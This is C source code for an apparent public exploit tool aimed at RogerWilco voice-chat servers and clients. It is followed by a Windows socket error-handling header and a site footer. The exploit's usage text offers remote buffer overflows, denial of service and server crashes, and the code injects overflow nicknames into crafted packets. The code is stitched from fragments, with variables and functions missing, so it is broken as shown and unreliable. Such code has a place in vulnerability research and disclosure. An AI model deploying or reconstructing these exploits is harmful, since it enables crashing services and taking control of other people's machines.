u_char bug = 0, next = 0; /* 0 = tag, 1 = size, 2 = data */ u_short type = 0, size = 0;
int main(int argc, char *argv[]) { u_char *buff = 0, *pcksend = 0, info = 0, autorejoin = 0; char *channel = CHANNEL, *nick = "", *password = 0; struct sockaddr_in peer; int sd, err, i, len; u_short pcklen, port = PORT;
setbuf(stdout, NULL);
fputs("\n" "Testing tool for RogerWilco "VER"\n" "by Luigi Auriemma\n" "e-mail: aluigi@pivx.com\n" "web: http://aluigi.altervista.org\n" "\n", stdout);
if(argc < 2) { printf("\nUsage: %s [bugs] [options] <host>\n" "\nBugs:\n" "-1 Remote broadcast BoF in versions 2001 and BoF in 1.4.1.6 (*)\n" "-2 DoS to freeze servers, versions 2001 and 1.4.1.6 (*)\n" "-3 Server crash in version 1.4.1.6 (*)\n" "-4 Buffer-overflow in versions 2001, 1.4.1.2 and 1.4.1.6(*)\n" "-5 Server's buffer-overflow versus ALL the graphical clients included\n" " the 1.4.1.6 ver and ALL the dedicated servers included the 0.30a\n" " version. This bug affets EVERY server also if you don't know its\n" " password (you must not set the channel to overwrite the return\n" " address with my default value AAAA)\n" "Options:\n" "-n NICK Chose your nickname (default invisible mode)\n" "-c CHAN Chose the channel to join (default \""CHANNEL"\")\n" "-w PASS Chose the password for joining the chat (default none)\n" "-p PORT Server port to connect to (default 3782) (default info-port 32230)\n" "-a Autorejoin immediately if kicked\n" "-i Retrieve info from the remote server using UDP (if not hidden)\n" "\n\n" "(*) These bugs affect the graphical server (not the dedicated server) and if\n" " the server is dedicated, all the clients connected are vulnerable\n" " This exploit, without using any of these bugs'options, runs like a sniffer\n" " and shows you some useful informations\n" "\n", argv[0]); exit(1); }
argc--; for(i = 1; i < argc; i++) { switch(argv[i][1]) { case '1': case '2': case '3': case '4': case '5': bug = argv[i][1] - 0x30; break; case 'n': nick = argv[++i]; break; case 'c': channel = argv[++i]; break; case 'w': password = argv[++i]; break; case 'p': port = atoi(argv[++i]); break; case 'a': autorejoin = 1; break; case 'i': info = 1; break; default: { printf("\nError: wrong argument (%s)\n", argv[i]); exit(1); } } }
/* I dunno what the following 12 bytes are, but they work fine */ memcpy(ptr, "\x6A\xD6\x4C\x03\x96\xED\x3B\xE7\x88\xE2\xA9\x74", 12); ptr += 12; memcpy(ptr, channel, chlen); ptr += chlen;
switch(bug) { case 1: nick = BOFNICK; break; case 2: { *pcklen = ptr - buff; return(buff); } break; case 3: nick = BOF2; break; case 4: nick = BOF3; break; default: break; }
------------------------------ winerr.h ------------------------------ /* Header file used for manage errors in Windows It support socket and errno too (this header replace the previous sock_errX.h) */
#include <string.h> #include <errno.h>
void std_err(void) { char *error;
switch(WSAGetLastError()) { case 10004: error = "Interrupted system call"; break; case 10009: error = "Bad file number"; break; case 10013: error = "Permission denied"; break; case 10014: error = "Bad address"; break; case 10022: error = "Invalid argument (not bind)"; break; case 10024: error = "Too many open files"; break; case 10035: error = "Operation would block"; break; case 10036: error = "Operation now in progress"; break; case 10037: error = "Operation already in progress"; break; case 10038: error = "Socket operation on non-socket"; break; case 10039: error = "Destination address required"; break; case 10040: error = "Message too long"; break; case 10041: error = "Protocol wrong type for socket"; break; case 10042: error = "Bad protocol option"; break; case 10043: error = "Protocol not supported"; break; case 10044: error = "Socket type not supported"; break; case 10045: error = "Operation not supported on socket"; break; case 10046: error = "Protocol family not supported"; break; case 10047: error = "Address family not supported by protocol family"; break; case 10048: error = "Address already in use"; break; case 10049: error = "Can't assign requested address"; break; case 10050: error = "Network is down"; break; case 10051: error = "Network is unreachable"; break; case 10052: error = "Net dropped connection or reset"; break; case 10053: error = "Software caused connection abort"; break; case 10054: error = "Connection reset by peer"; break; case 10055: error = "No buffer space available"; break; case 10056: error = "Socket is already connected"; break; case 10057: error = "Socket is not connected"; break; case 10058: error = "Can't send after socket shutdown"; break; case 10059: error = "Too many references, can't splice"; break; case 10060: error = "Connection timed out"; break; case 10061: error = "Connection refused"; break; case 10062: error = "Too many levels of symbolic links"; break; case 10063: error = "File name too long"; break; case 10064: error = "Host is down"; break; case 10065: error = "No Route to Host"; break; case 10066: error = "Directory not empty"; break; case 10067: error = "Too many processes"; break; case 10068: error = "Too many users"; break; case 10069: error = "Disc Quota Exceeded"; break; case 10070: error = "Stale NFS file handle"; break; case 10091: error = "Network SubSystem is unavailable"; break; case 10092: error = "WINSOCK DLL Version out of range"; break; case 10093: error = "Successful WSASTARTUP not yet performed"; break; case 10071: error = "Too many levels of remote in path"; break; case 11001: error = "Host not found"; break; case 11002: error = "Non-Authoritative Host not found"; break; case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; case 11004: error = "Valid name, no data record of requested type"; break; default: error = strerror(errno); break; } fprintf(stderr, "\nError: %s\n", error); exit(1); }
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.